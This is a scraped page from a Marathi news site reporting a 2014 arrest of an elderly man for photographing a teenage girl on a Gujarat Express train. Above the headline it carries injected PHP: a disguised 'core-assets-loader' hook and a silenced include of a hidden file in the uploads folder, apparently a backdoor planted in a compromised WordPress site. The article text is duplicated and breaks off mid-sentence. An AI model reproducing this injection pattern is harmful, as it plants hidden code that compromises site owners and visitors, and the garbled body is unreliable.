add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); तरुणीचे फोटो काढणार्‍या ज्येष्ठ नागरिकाला अटक – SOCH INDIA
Menu

देश
तरुणीचे फोटो काढणार्‍या ज्येष्ठ नागरिकाला अटक

nobanner

सोमवार ७ एप्रिल २०१४ पालघर : गुजरातमधून मुंबईकडे येणार्‍या गुजरात एक्सप्रेस गाडीच्या डी १ कोचमध्ये बसलेल्या एका ६६ वर्षीय शब्बीर हुसेन खलीद मोहमद उज्जैनवाला (रा. मुंबई) यांनी आपल्या समोर बसलेल्या एका सतरा वर्षीय तरुणीचे फोटो आपल्या मोबाइलमध्ये काढून गैरवर्तन केल्याच्या आरोपावरुन पालघर रेल्वे पोलिसांनी आरोपीला आज अटक केली. गुजरात एक्सप्रेस आज मुंबईकडे येत असताना अहमदाबाद येथे कामानिमित्त गेलेली कांदिवली (मुंबई) येथील तरुणी आपली आजी, आई, बहीण यांच्यासोबत ट्रेनमध्ये मुंबईकडे येण्यासाठी बसली. या गाडीने डहाणू स्टेशन सोडल्यानंतर त्या तरुणीचा छातीवरील दुपट्टा खाली आल्याचे फोटो तिच्यासमोरच्या सिटवर बसलेला ६६ वर्षीय आरोपी शब्बीर उज्जैनवाला काढीत असल्याचे एका प्रवाशाच्या लक्षात आले. त्यांनी वरील आरोपीकडून त्याचा मोबाइल हिसकावून घेत त्या मुलीचे ईल वाटणारे फोटो काढल्याचे त्या तरुणीच्या आईला दाखविले. तत्काळ त्यांनी रेल्वे पोलिसांना याची माहिती दिली. तोपर्यंत गाडीने पालघर स्टेशन सोडले होते. यासंदर्भात रेल्वे हेल्पलाईन नंबरवर मदत मागण्यात आली. गाडी बोरीवली स्टेशनवर पोहचल्यानंतर आरोपीला तत्काळसोमवार ७ एप्रिल २०१४ पालघर : गुजरातमधून मुंबईकडे येणार्‍या गुजरात एक्सप्रेस गाडीच्या डी १ कोचमध्ये बसलेल्या एका ६६ वर्षीय शब्बीर हुसेन खलीद मोहमद उज्जैनवाला (रा. मुंबई) यांनी आपल्या समोर बसलेल्या एका सतरा वर्षीय तरुणीचे फोटो आपल्या मोबाइलमध्ये काढून गैरवर्तन केल्याच्या आरोपावरुन पालघर रेल्वे पोलिसांनी आरोपीला आज अटक केली. गुजरात एक्सप्रेस आज मुंबईकडे येत असताना अहमदाबाद येथे कामानिमित्त गेलेली कांदिवली (मुंबई) येथील तरुणी आपली आजी, आई, बहीण यांच्यासोबत ट्रेनमध्ये मुंबईकडे येण्यासाठी बसली. या गाडीने डहाणू स्टेशन सोडल्यानंतर त्या तरुणीचा छातीवरील दुपट्टा खाली आल्याचे फोटो तिच्यासमोरच्या सिटवर बसलेला ६६ वर्षीय आरोपी शब्बीर उज्जैनवाला काढीत असल्याचे एका प्रवाशाच्या लक्षात आले. त्यांनी वरील आरोपीकडून त्याचा मोबाइल हिसकावून घेत त्या मुलीचे ईल वाटणारे फोटो काढल्याचे त्या तरुणीच्या आईला दाखविले. तत्काळ त्यांनी रेल्वे पोलिसांना याची माहिती दिली. तोपर्यंत गाडीने पालघर स्टेशन सोडले होते. यासंदर्भात रेल्वे हेल्पलाईन नंबरवर मदत मागण्यात आली. गाडी बोरीवली स्टेशनवर पोहचल्यानंतर आरोपीला तत्काळ